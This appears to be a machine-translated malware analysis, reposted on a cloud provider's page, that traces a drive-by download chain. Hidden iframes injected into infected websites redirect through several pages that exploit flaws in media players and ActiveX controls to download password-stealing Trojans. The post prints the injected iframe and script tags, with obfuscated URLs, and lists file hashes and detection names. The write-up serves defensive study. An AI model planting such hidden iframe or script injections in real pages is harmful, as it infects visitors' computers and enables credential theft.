Spread of ARP virus websites such as Trojan. psw. win32.onlinegames. gen

Source: Internet
Author: User
Tags crc32 xsl

Spread of ARP virus websites such as Trojan. psw. win32.onlinegames. gen

Original endurer
1st-

The virus adds code to the webpage:
/---
<IFRAME src = hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/Shui **/4.htm width = 0 Height = 0> </iframe>
---/

1 hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/Shui **/4.htm
Code included:
/---
<IFRAME src = hxxp: // www. I ** mm ** M * QM. ***. CN/h.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // D * m *. 1 ** 7ti ** ng ** gieba *. CN/c2.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/10wip.htm> </iframe>
---/

1.1 hxxp: // www. I ** mm ** M * QM. ***. CN/h.htm contains the Code:
/---
<IFRAME src = hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/cn3100.htm? BB? 6 width = 0 Height = 0> </iframe>
---/

1.1.1 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. ***. CN/VIP/cn3100.htm? BB? 6. Include and output the Code:
/---
<IFRAME src = wm2/index.html width = 1 Height = 1 border = 1> </iframe>
<IFRAME Style = display: None src = "2.gif"> </iframe>
<IFRAME Style = display: None src = "8.gif"> </iframe>
<IFRAME Style = display: None src = "1.gif"> </iframe>
<IFRAME Style = display: None src = "5.gif"> </iframe>
<IFRAME Style = display: None src = "11.gif"> </iframe>
<IFRAME Style = display: None src = "4.gif"> </iframe>
<IFRAME Style = display: None src = "12.gif" width = 100 Height = 1> </iframe>
<IFRAME Style = display: None src = "2.gif"> </iframe>
---/

1.1.1.1.1 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/1.gif

Download hxxp: // 20 *** 08*02*03. Se ** R ** Vice-Google. ***. CN/bf.exe with the storm video Vulnerability
File Description: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:37:50
Modified on: 20:37:50
Access time: 20:38:47
Size: 7368 bytes, 7.200 KB
MD5: 194872cfd1ab7a9f7bf2c7fc27997c02
Sha1: 5cb01436d73551e0c60775a7049870bcb9fec91c
CRC32: 7c458325
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ppu, rising reports Trojan. psw. win32.onlinegames. gen

1.1.1.1.2 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/2.gif
Use the ms0614 vulnerability to download hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. ***. CN/614.exe
614. EXE is the same as bf.exe.

1.1.1.1.3 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/3.gif

Use the qvod Player Plug-in vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/qvod.exe
Qvod.exeis the same as bf.exe.

1.1.1.1.4 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/4.gif

Use baidubar. tool to download hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. ***. CN/X. Cab
X.exe in X. Cab is the same as bf.exe.

1.1.1.1.5 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/5.gif

Use the PPStream vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/pps.exe
Pps.exe is the same as bf.exe.

1.1.1.1.6 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/6.gif contains the Code:
/---
<IFRAME src = hxxp: // 20 *** 08*02*21. se * r ** Vice-Google. ***. CN/VIP/OK _ OK .htm width = 0 Height = 0 border = 0> </iframe>
---/

1.1.1.1.6.1 hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. **. CN/VIP/OK _ OK .htm contains the Code:
/---
<IFRAME src = wm2/z.html width = 1 Height = 1 border = 0> </iframe>
---/

1.1.1.1.6.1.1 hxxp: // 20 ** 08*02*21. Se * r ** Vice-Google. **. CN/VIP/wm2/z.html
Content is the same as 1.1.1

1.1.1.1.7 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/7.gif
Same as 6.gif

1.1.1.1.8 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/8.gif

Use the RealPlayer vulnerability to download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. ***. CN/real.exe
Real.exe is the same as 6.gif.

1.1.1.1.9 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/9.gif
Same as 6.gif

1.1.1.1.10 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/10.gif
Same as 6.gif

1.1.1.1.11 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/11.gif

Download hxxp: // 20 ** 08*02*03. Se * r ** Vice-Google. **. CN/lz3.exe by exploiting the glchat. ocx Vulnerability in the Internet world
Lz3.exe is the same as bf.exe.

1.1.1.1.12 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/12.gif

Use the thunder vulnerability to download hxxp: // 20 ** 08*02*24. Se * r ** Vice-Google. ***. CN/xl.exe

Xl.exe is the same as bf.exe.

1.1.1.1.13 hxxp: // 0 ** 867*5. Se * r ** Vice-Google. **. CN/VIP/wm2/13.gif
Same as 6.gif

1.2 hxxp: // D * m *. 1 ** 7ti ** ng ** gieba *. CN/c2.htm contains the Code:
/---
<IFRAME src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/6664301.htm? Id = XSL width = 100 Height = 0> </iframe>
---/

1.2.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/6664301.htm? Id = XSL contains code:
/---
<IFRAME srcw.htm.html width = 100 Height = 0> </iframe>
---/

1.2.1.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/htm.html contains and outputs the Code:
/---
<IFRAME width = 100 Height = 0 src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/rl.htm> </iframe>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/1.js> </SCRIPT>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/bf.js> </SCRIPT>
<SCRIPT src = hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/pps.js> </SCRIPT>
<IFRAME width = '10' Height = '10' src = 'hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/3.htm'> </iframe>
---/

1.2.1.1.1 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/rl.htm

Use the RealPlayer vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/rl.exe

File Description: D:/test/rl.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 20:55:38
Modified on: 20:55:38
Access time: 20:56:21
Size: 23717 bytes, 23.165 KB
MD5: bfaf373042d10517fdc0fe713bbeb093
Sha1: ad5e17bd40a7604ea3fda5a35b372fbb5ba7df2e
CRC32: b6ea58c4

Kaspersky for Trojan-Downloader.Win32.Delf.epw "nspack, rising report for Trojan. DL. win32.direct. Me" iftdll

1.2.1.1.2 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/1.js

Use the ms0614 vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/014.exe
014. EXE is the same as rl.exe.

1.2.1.1.3 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/bf.js

Download hxxp: // exe. x * In ** Nia * NK * l.com/bf.exe
Bf.exe is the same as rl.exe.

1.2.1.1.4 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/pps.js

Use the PPS vulnerability to download hxxp: // exe. x * In ** Nia * NK * l.com/pps.exe
Pps.exe is the same as rl.exe.

1.2.1.1.5 use baidubar. tool to download hxxp: // exe. x * In ** Nia * NK * l.com/ad.cab
The bd.exe and rl.exe contained in AD. Cab are the same.

1.2.1.1.6 hxxp: // vvv. m ** P1 ** 15 ** 67.com/web/3.htm

Download hxxp: // exe. x * In ** Nia * NK * l.com/lz.exe by using the hangameplugincn18.dll, CLSID: Taobao, the main program glworld ActiveX control in the game hall of the Internet world.

Lz.exe is the same as rl.exe.

1.3 hxxp: // A ** D *. 1 ** 02 ** 4.mo *. CN/10wip.htm contains the Code:
/---
<IFRAME src = "hxxp: // www. ** 5 ** 9 *. VC/page/add_753643.htm? 111222222 "width = 0 Height = 0> </iframe>
---/

1.3.1 hxxp: // www. ** 5 ** 9 *. VC/page/add_753643.htm? 111222222 contains code:
/---
<SCRIPT src = ADDR. js> </SCRIPT>
---/

1.3.1.1 hxxp: // www. ** 5 ** 9 *. VC/page/ADDR. js
The code is unique and checks whether Kaspersky internetsecurity6.0 is installed on the viewer's computer.

Output code:
/---
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1 ** 8 ***. VG/baidu.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/bf.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/ms.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/real.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1 ** 8 ***. VG/lz.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/xl.gif"> </iframe>
<IFRAME Style = display: None src = "hxxp: // ***. W *** 1*8 ***. VG/ms.gif"> </iframe>
---/

1.3.1.1.1 hxxp: // ***. W *** 1 *** 8 ***. VG/baidu.gif

Use baidubar. tool.1 to download hxxp: // ***. W *** 1 *** 8 ***. VG/Calc. Cab
Calc. Cab contains s.exe

File Description: D:/test/s.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 23:34:34
Modification time: 23:34:34
Access time:
Size: 1444 bytes, 1.420 KB
MD5: 1b27b0c37f725a140955de91c58e2266
Sha1: 95fe224a524ef3c0bbcf5494ddef5e86b3926db3
CRC32: 2c2ce980

Kaspersky for Trojan-Downloader.Win32.Tiny.aid, rising for Trojan. DL. win32.inject. Small M upack0.39

1.3.1.1.2 hxxp: // ***. W *** 1 *** 8 ***. VG/bf.gif
File does not exist

1.3.1.1.3 hxxp: // ***. W *** 1 *** 8 ***. VG/ms.gif
Use the MS 0614 vulnerability to download hxxp: // ***. W *** 1 *** 8 ***. VG/s.exe

1.3.1.1.4 hxxp: // ***. W *** 1 *** 8 ***. VG/real.gif
Use the RealPlayer vulnerability to download hxxp: // ***. W *** 1 *** 8 ***. VG/s.exe

1.3.1.1.5 hxxp: // ***. W *** 1 *** 8 ***. VG/lz.gif
Use the world glchat. OCX (CLSID: AE93C5DF-A990-11D1-AEBD-5254ABDD2B69, _ licensed_to _ = "huyufeng";) vulnerability download: hxxp ://***. W ** 1*8 ***. VG/s.exe

1.3.1.1.6 hxxp: // ***. W *** 1 *** 8 ***. VG/xl.gif
Use thunder look (CLSID: F3E70CEA-956E-49CC-B444-73AFE593AD7F, _ licensed_to _ = "huyufeng";) vulnerability download: hxxp: // ***. W *** 1*8 ***. VG/s.exe

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.